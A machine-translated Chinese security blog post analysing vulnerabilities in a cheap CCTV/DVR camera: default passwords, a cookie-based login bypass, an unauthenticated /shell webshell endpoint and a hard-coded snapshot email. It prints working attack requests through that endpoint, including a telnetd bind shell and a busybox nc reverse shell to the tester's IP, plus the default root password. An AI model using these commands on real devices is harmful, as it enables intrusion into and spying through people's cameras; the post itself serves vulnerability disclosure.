Mickey · 2016/02/18 11:02

0x00 Vulnerability analysis


Today to see the foreigner is analyzed a cheap CCTV cameras, and address in www.pentestpartners.com/blog/pwning… Amazon to buy www.amazon.co.uk/dp/B0162AQC, camera… There are four main vulnerabilities exposed by foreigners: default password, web login authentication bypass, built-in webshell, and sending camera pictures to hard-coded email address. The article of foreigners has been tested by me, there are errors and incomplete places, I have added one by one below 🙂

1. Default password

The default WEB login name is admin and the password is empty.

In addition, after cracking passwd, it is found that the default password of root is “juantech”. You can directly obtain cmdshell through Telnet login, as shown in Figure 1:

2. WEB authentication is bypassed

When you first visit index.html, you will be asked to enter a username and password. If you enter the correct username, you will be directed to view2.html. If you access view2.html directly, you will be redirected to index.html, asking you to enter account information. Download the firmware and decompress it with Binwalk, as shown in Figure 2:

View view2.js and find the following:

#! Js $(document).ready(function(){dvr_camcnt = Cookies. Get (" dvr_camcnt"); dvr_usr = Cookies.get("dvr_usr"); dvr_pwd = Cookies.get("dvr_pwd"); if(dvr_camcnt == null || dvr_usr == null || dvr_pwd == null) { location.href = "/index.html"; }Copy the code

As you can see, if dvr_camcnt,dvr_usr,dvr_pwd are null, then we jump to index.html, so we just set dvr_camcnt,dvr_usr,dvr_pwd not null. View2.js source can know that DVr_camcnt is actually control channel (CHANEL), as follows:

#! js function goto_open_all() 80 { 81 if(dvr_viewer && dvr_viewer.ConnectRTMP) 82 { 83 dvr_viewer.SetPlayerNum(dvr_camcnt); 84 // switch(dvr_camcnt) 85 // { 86 // case "4": 87 // dvr_viewer.flSetViewDiv(4); 88 // break; 89 // case "8": 90 // dvr_viewer.flSetViewDiv(9); 91 // break; 92 // case "16": 93 // dvr_viewer.flSetViewDiv(16); 94 // break; 95 // case "24": 96 // dvr_viewer.flSetViewDiv(25); 97 // break; 98 // } 99 open_all(dvr_camcnt); 100 } 101 else 102 { 103 dvr_viewer = $("#viewer")[0]; 104 setTimeout(goto_open_all, 1000); 106 105}}Copy the code

Dvr_camcnt can only set 2,4,8,24. The actual test, enter other values can be fine. The proof of bypassing login authentication is shown in Figure 3

3. Built-in Webshell

By looking at the decompression after firmware directory, we found that dvr_app contains a web service, using strings to see dvr_app binary, you can see/moo, / whoami, / shell/snapshot characters, try to access, found no verification can access these functions, As shown in figure 4,

When accessing /shell, it is stuck, drag dvr_app into IDA, check the corresponding processing logic of shell function, because the firmware is a small end architecture of ARM, you can directly see pseudo code in IDA F5. As shown in figure 5

Here there are two ways to use, one is to directly telnetd bind /bin/sh to any port, and then Telnet to connect to the port, without authentication can Telnet login, this way of use when you do not know the firmware itself Telnet account information, is a very common way to use. The command is as follows:

http://target IP address /shell?/usr/sbin/telnetd -l/bin/sh -p 25Copy the code

However, there are firewall /NAT issues to consider in the actual testing, many devices only map 80, you open other ports, although the device is open, but you can not connect. As shown in figure 6.

At this time, you can use nc rebound shell to come out, probably because the firmware version is different, the target of my test busybox has its own NC, so I passed the execution

http://target IP address /shell?/bin/busybox nc My IP address is 53 -e /bin/shCopy the code

You can get the bounced CMdshell, as shown in Figure 7

So he statically compiled a Busybox, downloaded it to a writable directory via wget, then gave Busybox executable permission, and finally ran the NC command. He has provided the compiled busybox, can download at http://212.111.43.161/busybox.

4. Send the camera picture to the hard-coded email address

Looking at the DVr_app binary through strings, we found another suspicious string

.rodata:002260E0 0000005A C [email protected]&subject=Who are you? &content=%s&snapshot=yes&vin=0&size=320×180

[email protected], “found https://github.com/simonjiuan/ipc/blob/master/src/cgi_misc.c, through the source code can be seen

#! c #define DEFAULT_USER_EMAIL "[email protected]"
#define DEFAULT_USER_PASSWORD "dvrhtml"
#define DEFAULT_SMTP_SERVER "mail.esee100.com"
#define DEAFULT_TARGE_EMAIL "[email protected]"
Copy the code

@hdmoore also mentioned this Chinese email on Twitter, so I took a peek. Currently mail.esee100.com is not resolved, but esee100.com CNMAE is resolved to www.dvrskype.com. Check the domain name information at www.dvrskype.com, [email protected], as shown in Figure 8. Note that ORG is “Guangzhou Jiuan Optoelectronic Technology Co., LTD.” and the uploader of Github is also a technical staff member of Jiuan Optoelectronic Technology Co., LTD. As you can see in Figure 9, he would have included the /whoami return message and the CCTV camera shot at startup [email protected]. Of course, this SMTP sending server no longer exists, or it may have been a test function left over from the development at that time.

0x01 Global Statistics


Because it is a custom Web server running, the HTTP server header contains significant “JAWS/1.0” characteristics, Sans recently more attention to domestic vulnerability scanning (https://isc.sans.edu/forums/diary/Scanning+for+Fortinet+ssh+backdoor/20635/), so I just used shodan results directly. As shown in figure 10

As you can see, there are about 42,545 cheap CCTV cameras worldwide that are open to the Internet. The most popular port is 80/8080, and the most popular countries are Turkey, India and Vietnam. 🙂

At present, there should also be malicious use of this CCTV camera automation, through looking at several, found that several devices are contained in the process

 1560 root       620 S    ./dropbear -p 15081 -r /tmp/dropbear/dropbear_rsa_ho
Copy the code

And wGET remote download malicious use of files.

0x02 Vulnerability Prevention


Currently, there is no official firmware patch. You are advised not to open management ports such as 80/23.

0x03 Thank the people


Thanks to low-key Mr. Zhang for teaching me reverse knowledge. Mr. Zhang’s kindness and kindness are patient answers to my childish questions, and he has never been bored.